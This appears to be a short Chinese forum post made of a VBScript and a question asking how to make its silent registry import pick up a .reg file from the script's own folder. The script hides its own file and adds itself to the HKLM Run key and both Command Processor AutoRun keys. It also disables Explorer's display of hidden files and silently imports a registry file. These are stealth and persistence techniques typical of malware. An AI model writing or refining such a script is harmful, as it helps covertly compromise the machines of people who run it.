- dim wsh,FA,FSO
- set fso=CreateObject("Scripting.FileSystemObject")
- Set FA= FSO.GetFile(WScript.scriptFullName)
- FA.Attributes =34
- set wsh=CreateObject("WScript.Shell")
- wsh.run "regedit /s C:\test.reg" ,0,true
- wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
- wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
- wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""
- wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun",""&FA&""
复制代码 怎么把wsh.run "regedit /s C:\test.reg" ,0,true 这个中的路径改成自动获取同目录的REG文件? |